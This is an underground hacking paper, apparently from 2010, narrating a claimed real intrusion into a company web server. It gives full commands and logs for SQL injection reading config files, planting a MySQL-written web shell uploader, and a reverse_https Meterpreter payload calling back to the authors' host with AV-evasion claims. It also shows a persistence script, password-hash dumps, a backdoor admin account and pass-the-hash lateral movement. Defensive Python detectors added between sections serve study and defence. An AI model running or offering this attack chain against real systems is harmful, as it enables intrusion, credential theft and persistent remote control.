|=--------------------------------------------------------------------=|
|=----------------=[ The Operation OutBreak Attack ]=-----------------=|
|=--------------------------=[ 26 Dec 2010 ]=-------------------------=|
|=----------------------=[ By CWH Underground ]=----------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : The Operation OutBreak Attack
Author : ZeQ3uL (Prathan Phongthiproek)
Retool2 (Suttapong Wara-asawapati)
Team : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Website : www.citecclub.org
Date : 2010-12-26
##########
Contents
##########
[0x00] - Introduction
[0x01] - OutBreak Web Application
[0x02] - OutBreak MySQL Database
[0x03] - OutBreak with Autosploit.rc
[0x04] - Outbreak to Internal Server
[0x05] - References
[0x06] - Greetz To
#######################
[0x00] - Introduction
#######################
Hi all, in this paper we will show you our hacking method (with logs) from a real-world case study on a company.
Moreover, we also show ways to use the best exploitation tool, the Metasploit Framework (thanks to HD Moore and Rapid7), which is far more powerful than in the past, with many exploits and auxiliary modules (we will see it ;D).
We recommend reading our previous paper, "The Operation Cloudburst Attack", which guides you through hacking methods with the Metasploit Framework.
###################################
[0x01] - OutBreak Web Application
###################################
First, I use nmap to scan for open ports on the target and found the information below:
[Nmap Result]-----------------------------------------------------------------------------------
root@bt:~# nmap -sV -PN www.mbank.com
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-12-02 02:13 EST
Nmap scan report for www.mbank.com
Host is up (0.0070s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.0 ((Win32) PHP/5.2.4)
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.95 seconds
[End Result]------------------------------------------------------------------------------------
From the result, I can only access 2 ports (HTTP, MySQL). As the next step, I can guess that a phpinfo.php file exists,
which contains web server information (we need it to enumerate information for the next attack step).
[Wget Result]-----------------------------------------------------------------------------------
root@bt:~#wget www.mbank.com/phpinfo.php
--2010-12-02 02:19:23-- http://www.mbank.com/phpinfo.php
Connecting to www.mbank.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `phpinfo.php'
[ <=> ] 47,540 --.-K/s in 0.004s
2010-12-02 02:19:23 (10.3 MB/s) - `phpinfo.php' saved [47540]
root@bt:~# more phpinfo.php | grep "DOCUMENT_ROOT"
DOCUMENT_ROOT | D:/www/htdocs/ |
_SERVER["DOCUMENT_ROOT"] | D:/www/htdocs |
[End Result]------------------------------------------------------------------------------------
I read phpinfo.php and learned that the web root is "D:/www/htdocs/". Now I look for the configuration file (config.php/configuration.php) that keeps the database information.
In this real case study we found it at www.mbank.com/include/config.php. Next, discover the entry point for attacking the web application. The well-known one is SQL Injection, which is still hot, and many websites still lack prevention.
I can attack the target with this string: "www.mbank.com/news.php?id=1 and 1=2 union select 1,2,3,4,5--". Normally we know that we can dump database information through a SQL Injection vulnerability,
but nowadays that is hard because many databases store information as MD5 or SALT+MD5 hashes, which are harder for an attacker to crack (a waste of time). So instead of dumping information I switch to viewing the configuration file (that's better !!) with the MySQL load_file function.
From phpinfo.php, we knew the root directory path -> D:/www/htdocs/
From the configuration file, we knew its location -> www.mbank.com/include/config.php (D:/www/htdocs/include/config.php)
I encode D:/www/htdocs/include/config.php to HEX -> 0x443a2f7777772f6874646f63732f696e636c7564652f636f6e6669672e706870
Then I put it into the SQL Injection string -> http://www.mbank.com/news.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,load_file%280x443a2f7777772f6874646f63732f696e636c7564652f636f6e6669672e706870%29,3,4,5--
and looking at the page source with view source, I found the database information like this:
[View Source]-----------------------------------------------------------------------------------
........
$user="root";
$password="1qaz2wsx!@#$";
$database="mbank";
$localhost="localhost";
mysql_connect($localhost,$user,$password);
@mysql_select_db($database) or die( "Unable to select database");
?>
.......
[End Result]------------------------------------------------------------------------------------
Now we have the username and password for the MySQL database => root/1qaz2wsx!@#$
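The injection above, seen from the web server's side: an added detection example (not part of the original paper) that scans constructed Apache access-log lines for UNION-based injection, strips the /**/ padding and URL encoding, and decodes the 0x hex literal to show which file load_file() was pointed at. The client IP and timestamps in the sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the paper); the request
# strings mirror the injection pattern shown above: /**/ in place of
# spaces, UNION SELECT, and load_file() on a hex-encoded path.
SAMPLE_LOG = """\
1.2.3.4 - - [02/Dec/2010:02:30:01 -0500] "GET /news.php?id=1 HTTP/1.1" 200 5120
1.2.3.4 - - [02/Dec/2010:02:31:10 -0500] "GET /news.php?id=1%20and%201=2%20union%20select%201,2,3,4,5-- HTTP/1.1" 200 611
1.2.3.4 - - [02/Dec/2010:02:33:42 -0500] "GET /news.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,load_file%280x443a2f7777772f6874646f63732f696e636c7564652f636f6e6669672e706870%29,3,4,5-- HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) ')
HEX_LITERAL_RE = re.compile(r'0x([0-9a-fA-F]{2,})')

def normalize(query):
    """URL-decode (twice, for double encoding), replace /**/ comment padding
    with spaces, collapse whitespace and lowercase so the checks are stable."""
    q = unquote(unquote(query))
    q = re.sub(r'/\*.*?\*/', ' ', q)
    return re.sub(r'\s+', ' ', q).lower()

def decode_hex_literals(text):
    """Render MySQL 0x... string literals as text so the analyst sees the
    file path that load_file() was pointed at."""
    out = []
    for h in HEX_LITERAL_RE.findall(text):
        try:
            out.append(bytes.fromhex(h).decode('ascii'))
        except (ValueError, UnicodeDecodeError):
            continue
    return out

def scan_access_log(log_text):
    """Return (line_no, verdict, decoded_paths) for requests that look like
    UNION-based injection; load_file() read attempts are ranked highest."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        q = normalize(m.group(1))
        if 'union select' not in q:
            continue
        if 'load_file(' in q:
            findings.append((n, 'file-read', decode_hex_literals(q)))
        else:
            findings.append((n, 'union-probe', []))
    return findings
```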
##################################
[0x02] - OutBreak MySQL Database
##################################
I try to connect to MySQL/3306 with the mysql client and it works (by default, the root account cannot connect to this port except from localhost).
If you cannot connect directly to MySQL/3306, you can look for a database admin path (/phpMyadmin or /phpmyadmin) as an alternative.
[MySQL Log]-----------------------------------------------------------------------------------
root@bt:~# mysql -u root -p1qaz2wsx!@#$ -h www.mbank.com -P 3306
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 83
Server version: 5.0.24a-community-nt MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mbank |
| mysql |
| smf |
+--------------------+
4 rows in set (0.00 sec)
mysql> use mbank;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> CREATE TABLE GETSHELL (GETSHELL TEXT NOT NULL);
Query OK, 0 rows affected (0.07 sec)
mysql> INSERT INTO GETSHELL VALUES ('$file=$_FILES[up][tmp_name];if($file){copy($file,"shell.php");echo"OK";unlink($file);}else{echo"error";}?>');
Query OK, 1 row affected (0.00 sec)
mysql> SELECT * FROM GETSHELL into outfile 'D:\\www\\htdocs\\upload.php';
Query OK, 1 row affected (0.00 sec)
[End Result]------------------------------------------------------------------------------------
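What the same write looks like in the MySQL general query log: an added example, not part of the original paper, that flags INTO OUTFILE/DUMPFILE statements whose target lands under the web root recovered from phpinfo.php (D:/www/htdocs). The log lines and client address are constructed, and the line layout assumed is MySQL's general_log file format.

```python
import re
from pathlib import PureWindowsPath

# Web document root recovered from phpinfo.php in the write-up; on a real
# host this comes from the web server configuration.
DOC_ROOT = "D:/www/htdocs"
SCRIPT_EXTS = {".php", ".php3", ".phtml", ".asp", ".aspx", ".jsp", ".cgi"}

# Constructed sample general-log lines (time, connection id, command, text);
# the last two mirror the statements run above. 198.51.100.7 is made up.
SAMPLE_GENERAL_LOG = """\
101202  2:35:10      83 Connect   root@198.51.100.7 on mbank
101202  2:35:11      83 Query     show databases
101202  2:35:40      83 Query     SELECT * FROM news WHERE id=1 INTO OUTFILE 'D:/backup/news.csv'
101202  2:36:02      83 Query     CREATE TABLE GETSHELL (GETSHELL TEXT NOT NULL)
101202  2:36:30      83 Query     SELECT * FROM GETSHELL into outfile 'D:\\\\www\\\\htdocs\\\\upload.php'
"""

OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s+'((?:[^'\\]|\\.)*)'", re.I)

def unescape_sql(s):
    """Undo MySQL string-literal escaping (a doubled backslash becomes one)."""
    return re.sub(r"\\(.)", r"\1", s)

def under_doc_root(path, doc_root=DOC_ROOT):
    """Case-insensitive containment test; Windows paths may use / or \\."""
    try:
        PureWindowsPath(path).relative_to(PureWindowsPath(doc_root))
    except ValueError:
        return False
    return True

def scan_general_log(log_text, doc_root=DOC_ROOT):
    """Flag OUTFILE/DUMPFILE statements whose target lands inside the web
    root; a script extension there means a freshly planted web shell."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = OUTFILE_RE.search(line)
        if not m:
            continue
        target = unescape_sql(m.group(1))
        if under_doc_root(target, doc_root):
            ext = PureWindowsPath(target).suffix.lower()
            sev = "critical" if ext in SCRIPT_EXTS else "high"
            hits.append((n, target.replace("\\", "/"), sev))
    return hits
```

The log only shows that the write already happened; the FILE privilege gates whether it is possible at all, and on servers that support it secure_file_priv confines OUTFILE to one directory.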
Now I can access www.mbank.com/upload.php to upload a PHP shell (C99, R57, etc.), but many web servers have antivirus installed, so I encode the PHP shell with base64 for FUD. For example (Incop's shell, which bypasses AV):
[Incop Shell]-----------------------------------------------------------------------------------
[End Result]------------------------------------------------------------------------------------
Save it as incop.php. When I upload this file, it is renamed to shell.php (depending on the upload.php file I created from the mysql client). Now I have a PHP backdoor (shell.php) on the target website.
Now move to Metasploit. I created an exe payload with msfpayload that connects back to my server.
./msfpayload windows/meterpreter/reverse_https LHOST=cwh.dyndns.org LPORT=443 X > rev.exe
We get a rev.exe file that is 100% SSL-encrypted. I tested it, and it can bypass these AVs:
- Avast / Avast5
- AVG
- ClamAV
- eSafe
- Fortinet
- Kaspersky
- McAfee / McAfee-GW-Edition
- Nod32
- Symantec
- TrendMicro
- Etc.
Upload rev.exe to www.mbank.com with shell.php.
######################################
[0x03] - OutBreak with Autosploit.rc
######################################
Next step: I use the Metasploit console to wait for the connect back. I wrote the autosploit.rc script for Metasploit:
[autosploit.rc]-----------------------------------------------------------------------------------
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LPORT 443
set LHOST cwh.dyndns.org
set ExitOnSession false
exploit -j
sleep(1)
print_status("Waiting on an incoming sessions...")
while (true)
  framework.sessions.each_pair do |sid,s|
    thost = s.tunnel_peer.split(":")[0]
    if s.ext.aliases['stdapi']
      sleep(1)
      print_status("Migrating to Explorer...")
      s.console.run_single("run migrate explorer.exe")
      print_status("Persistence to session #{sid} #{thost}...")
      s.console.run_single("run persistence -U -i 10 -p 443 -r cwh.dyndns.org")
      sleep(1)
      print_status("Closing session #{sid} #{thost}...")
    else
      print_status("Session #{sid} #{thost} active, but not yet configured")
    end
  end
  sleep(1)
end
print_status("All done")
[End Result]------------------------------------------------------------------------------------
Run this script with "msfconsole -r autosploit.rc" on my server (cwh.dyndns.org):
[MSF Log]-----------------------------------------------------------------------------------
root@bt:~# msfconsole -r autosploit.rc
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 638 exploits - 314 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11405 updated today (2010.12.13)
resource (autosploit.rc)> use exploit/multi/handler
resource (autosploit.rc)> set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
resource (autosploit.rc)> set LPORT 443
LPORT => 443
resource (autosploit.rc)> set LHOST cwh.dyndns.org
LHOST => cwh.dyndns.org
resource (autosploit.rc)> set ExitOnSession false
ExitOnSession => false
resource (autosploit.rc)> exploit -j
[*] Exploit running as background job.
[*] resource (autosploit.rc)> Ruby Code (599 bytes)
[*] Started reverse handler on cwh.dyndns.org:443
[*] Server started.
[*] Waiting on an incoming sessions...
[End Result]------------------------------------------------------------------------------------
Next step: we go back to shell.php and run rev.exe so it connects back to cwh.dyndns.org. My server will have a log like this:
[MSF Log]-----------------------------------------------------------------------------------
[*] Sending stage (749056 bytes) to 202.57.123.61
[*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 202.57.123.61:1150) at Mon Dec 13 06:26:02 -0500 2010
[*] Session 1 202.57.123.61 active, but not yet configured
[*] Current server process: rev.exe (2312)
[*] Spawning a explorer.exe host process
[*] Migrating into process ID 3240
[*] New server process: explorer.exe (3240)
[*] Persistence to session 1 202.57.123.61...
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf3/logs/scripts/persistence/MBank-9V0YIKHGUQ_20101213.2605/MBank-9V0YIKHGUQ_20101213.2605.rc
[*] Creating Payload=windows/meterpreter/reverse_https LHOST=cwh.dyndns.org LPORT=443
[*] Persistent agent script is 612403 bytes long
[+] Persisten Script written to C:\DOCUME~1\ADMINI~1.BAN\LOCALS~1\Temp\PXPAoEDWXHCQm.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1.BAN\LOCALS~1\Temp\PXPAoEDWXHCQm.vbs
[+] Agent executed with PID 2172
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\pwDRjMUermyWOM
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\pwDRjMUermyWOM
[End Result]------------------------------------------------------------------------------------
My autosploit script finished uploading the backdoor to the server with persistence techniques (Mbank will reverse connect to cwh.dyndns.org every 10 seconds). WooT WooT !!
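The autorun that the persistence script reports above is what a host review should catch: an added example, not from the paper, that parses a constructed .reg export of the HKCU Run key and flags entries that launch a script from a Temp directory under a random-looking value name. The export contents, including the benign ctfmon.exe entry, are constructed, and the flagged entry's value data is assumed to be the .vbs path.

```python
import re
# Constructed registry export (.reg) text; the suspicious entry mirrors the
# autorun name and script path reported by the persistence script above.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"pwDRjMUermyWOM"="C:\\DOCUME~1\\ADMINI~1.BAN\\LOCALS~1\\Temp\\PXPAoEDWXHCQm.vbs"
"""

VALUE_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd"}
TEMP_DIR_RE = re.compile(r"\\(?:temp|tmp)\\", re.I)

def looks_random(name):
    """Tool-generated autorun names are letter soup: long, letters only,
    and switching case often. Human-chosen names rarely do all three."""
    if len(name) < 10 or not name.isalpha():
        return False
    switches = sum(1 for a, b in zip(name, name[1:]) if a.islower() != b.islower())
    return switches >= 4

def parse_reg_values(text):
    """Yield (key, value_name, data) from a .reg export, unescaping backslashes."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m.group(1), re.sub(r"\\(.)", r"\1", m.group(2))

def audit_run_keys(text):
    """Return (value_name, launched_path, reasons) for Run entries worth a look."""
    findings = []
    for key, name, data in parse_reg_values(text):
        if not key.lower().endswith(r"\currentversion\run"):
            continue
        reasons = []
        # First token of the command line: a quoted path or the bare program.
        target = data.split('"')[1] if data.startswith('"') else data.split(" ")[0]
        if TEMP_DIR_RE.search(target):
            reasons.append("runs from a Temp directory")
        if any(target.lower().endswith(e) for e in SCRIPT_EXTS):
            reasons.append("script payload rather than an installed program")
        if looks_random(name):
            reasons.append("random-looking value name")
        if reasons:
            findings.append((name, target, reasons))
    return findings
```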
######################################
[0x04] - Outbreak to Internal Server
######################################
I enumerate information from the target to attack the internal servers. First I use nmap to scan for Windows machines on the subnet, then use hashdump to dump the SAM file, and use psexec to try to connect to a server
that uses the same username/password (adminit). BINGO !! I can "Pass the Hash" to target 202.57.123.65, which uses adminit:1009:4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468:::
[Nmap]-----------------------------------------------------------------------------------
msf exploit(handler) > nmap -v -sP 202.57.123.1/24 -p 139,445
Starting Nmap 5.21 ( http://nmap.org ) at 2010-12-13 00:09 ICT
Initiating ARP Ping Scan at 00:09
Scanning 103 hosts [1 port/host]
Completed ARP Ping Scan at 00:09, 1.28s elapsed (103 total hosts)
Initiating Parallel DNS resolution of 103 hosts. at 00:09
Completed Parallel DNS resolution of 103 hosts. at 00:09, 0.02s elapsed
...
Completed SYN Stealth Scan at 00:09, 0.01s elapsed (6 total ports)
Nmap scan report for 202.57.123.62
Host is up (0.0045s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:1D:7E:AE:44:A6
Nmap scan report for 202.57.123.65
Host is up (0.0044s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
...
[End Result]------------------------------------------------------------------------------------
[Pass the Hash]-----------------------------------------------------------------------------------
msf exploit(handler) >sessions -i 1
[*] Starting interaction with 1...
meterpreter > hashdump
Administrator:500:f0d412bd764ffe81aad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
adminit:1009:4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468:::
ASPNET:1007:a29f3377e4a58eb1107fc8633cfe562c:c6a7c566af537b816f001d0fea95199f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_MBANK-9V0YIKHGUQ:1004:3454d175ec02f1a94da8ede9bacc6fbb:1c297be0bfc17b7285746dc763fa834a:::
IWAM_MBANK-9V0YIKHGUQ:1006:70246d502a449bb1e9139ddc3f21bf91:41852ceb10626856344e782c3bcbfc5b:::
SUPPORT_388945a0rs:1001:aad3b435b51404eeaad3b435b51404ee:35dbf71c3861f3f6338ae1b54ac20a70:::
meterpreter > shell
Process 2564 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
D:\www\htdocs>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.
D:\www\htdocs>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.
D:\www\htdocs>exit
meterpreter >
Background session 1? [y/N]y
msf exploit(handler) >use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 202.57.123.65
RHOST => 202.57.123.65
msf exploit(psexec) > set SMBUser adminit
SMBUser => adminit
msf exploit(psexec) > set SMBPass 4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468
SMBPass => 4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Connecting to the server Authenticating as user 'adminit'
[*] Uploading payload
[*] Created \wRAGxeKp.exe
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:202.57.123.65[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:202.57.123.65[\svcctl] ...
[*] Obtaining a service manager handle
[*] Creating a new service (bbULKlnn - "Mn0aWrz")
[*] Closing service handle
[*] Opening service
[*] Starting the service
[*] Removing the service
[*] Closing service handle
[*] Deleting \wRAGxeKp.exe
[*] Sending stage (748032 bytes) to 202.57.123.65
[*] Meterpreter session 2 opened (202.57.123.61:55640 -> 202.57.123.65:4444) at Mon Dec 13 07:10:32 -0500 2010
meterpreter >
[End Result]------------------------------------------------------------------------------------
From the above, it's hard to control the system because I can control it only from msfconsole or the PHP shell.
So I go to the PHP shell and type the command "netstat -an" to view open ports on www.mbank.com. I found this server has Remote Desktop/3389 open. I move to msfconsole on my cwh.dyndns.org and use port forwarding:
meterpreter > portfwd add -l 3389 -p 3389 -r 127.0.0.1
Next, I can use rdesktop to connect to the www.mbank.com server with this command:
root@bt:~#rdesktop -u cwh -p 1234 localhost
Now we have fully compromised www.mbank.com with Remote Desktop and can use this machine to remote desktop into the internal servers (202.57.123.65, etc.).
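The shared adminit credential that made the pass-the-hash hop above possible is something a defender can audit for: an added example, not from the paper, that takes hashdump-format output from several hosts and reports NT hashes reused across them, plus accounts still carrying an LM hash. Host names and hashes are constructed, apart from the well-known empty LM and empty NT hash values.

```python
# Constructed hashdump-style output from two hosts (user:rid:LM:NT:::).
# All hashes are made up except the well-known empty-LM and empty-NT values;
# the point is the NT hash shared by the same local account on both hosts.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAMPLE_DUMPS = {
    "web01": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
adminit:1009:0123456789abcdefaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
""",
    "app02": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
adminit:1009:0123456789abcdefaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
""",
}

def parse_hashdump(text):
    """Return {user: (rid, lm, nt)} from pwdump/hashdump lines."""
    accounts = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[0]:
            continue
        accounts[parts[0]] = (parts[1], parts[2].lower(), parts[3].lower())
    return accounts

def find_shared_credentials(dumps):
    """Map each NT hash seen on more than one host to the (host, user) pairs
    sharing it. Empty NT hashes are skipped. One entry here means one stolen
    hash opens every host listed, which is exactly the hop shown above."""
    seen = {}
    for host, text in dumps.items():
        for user, (_rid, _lm, nt) in parse_hashdump(text).items():
            if nt == EMPTY_NT:
                continue
            seen.setdefault(nt, []).append((host, user))
    return {nt: owners for nt, owners in seen.items() if len(owners) > 1}

def lm_hashes_present(dumps):
    """(host, user) pairs still storing a real LM hash (legacy, easily cracked)."""
    return sorted((h, u) for h, t in dumps.items()
                  for u, (_r, lm, _n) in parse_hashdump(t).items() if lm != EMPTY_LM)
```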
Enjoy !! and Merry X' Mas
#####################
[0x05] - References
#####################
[1] http://blog.metasploit.com/
[2] Metasploit Unleashed
####################
[0x06] - Greetz To
####################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
Special Thx : asylu3, citecclub.org, exploit-db.com
----------------------------------------------------
This paper is written for educational purposes only. The authors are not responsible for any damage
originating from using this paper for the wrong objective. If you want to use this knowledge on another person's systems,
you must request consent from the system owner first.
----------------------------------------------------